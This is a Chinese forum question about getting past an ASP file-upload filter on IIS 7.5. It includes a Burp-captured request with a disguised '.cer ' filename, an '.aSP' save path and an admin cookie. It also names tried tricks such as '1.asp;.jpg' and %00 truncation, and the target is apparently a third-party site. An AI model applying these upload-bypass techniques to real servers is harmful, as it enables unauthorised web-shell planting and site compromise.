您的位置:首页>问答>上传绕过问题
关注
261    1

上传绕过问题

burp抓到的数据:

POST /fun/upload/upload.asp HTTP/1.1
Host: www.xxxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.xxxx.com/fun/upload/index.asp?savePath=/upload/Link/&act=delnow&picPathName=/upload/Link/2018572320425.jpg&p_imgPic=pic&p_put=pic_put
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 7202
Cookie: ASPSESSIONIDSQRDDBDT=ODLHDPBANHEILAPPJEFOPCAP; admin%5Fuser=admin888; admin%5Fid=3
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="p_imgPic"

pic
-----------------------------24464570528145
Content-Disposition: form-data; name="p_putPic"

picPathFileName
-----------------------------24464570528145
Content-Disposition: form-data; name="file1"; filename="1.cer "
Content-Type: image/jpeg

‰xxxxxxxxxxxxxxxxxxxxxxxxxx内容xxxxxxxxxxxxxxx


-----------------------------24464570528145
Content-Disposition: form-data; name="savepath"

/upload/Link/1.aSP
-----------------------------24464570528145
Content-Disposition: form-data; name="Submit"

Ìá½»
-----------------------------24464570528145--



iis7.5的版本,%00截断报错  


这是当前上传页面的源码


<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
<style type="text/css">
<!--
body {
    margin-left: 0px;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
}
-->
</style>

<** language="java**">
<!--
function picUrlchange()
{
    if(document.MyForm.file1.value!='')
        parent.document.getElementById("pic").style.display="block";
        parent.document.getElementById("pic").src=document.MyForm.file1.value;
}

function cheFor()
{
    if(document.MyForm.file1.value=="")
    {
        **("请选择图片!");
        return false;
    }
    return true;
}
-->
</**>

</head>

<body>
<table width="282" cellspacing="0" cellpadding="0" border="0">
<form method="post" name="MyForm" action="upload.asp" enctype="multipart/form-data" onsubmit="return cheFor();"></form>
<input name="p_imgPic" value="pic" type="hidden">
<input name="p_putPic" value="pic_put" type="hidden">
  <tbody><tr>
    <td width="85%"><input name="file1" onchange="picUrlchange()" type="file"></td>
    <input name="savepath" value="/admin/" type="hidden">
    <td width="15%"><input name="Submit" value="提交" type="submit"></td>
  </tr>

</tbody></table>


对本地文件有检测列如 上传选择1.asp;.jpg  会报错   上传1.jpg;.gif也会报错 猜测是对文件名字符检测  如何突破

一周回答雷锋榜

  • 1
    • 晴天gg
    • 口若悬河,啥都知道
    (2) 回答
  • 2
    • 酉酉
    • 口若悬河,啥都知道
    (2) 回答
  • 3
    • 飞翔的helan人
    • 低调围观
    (1) 回答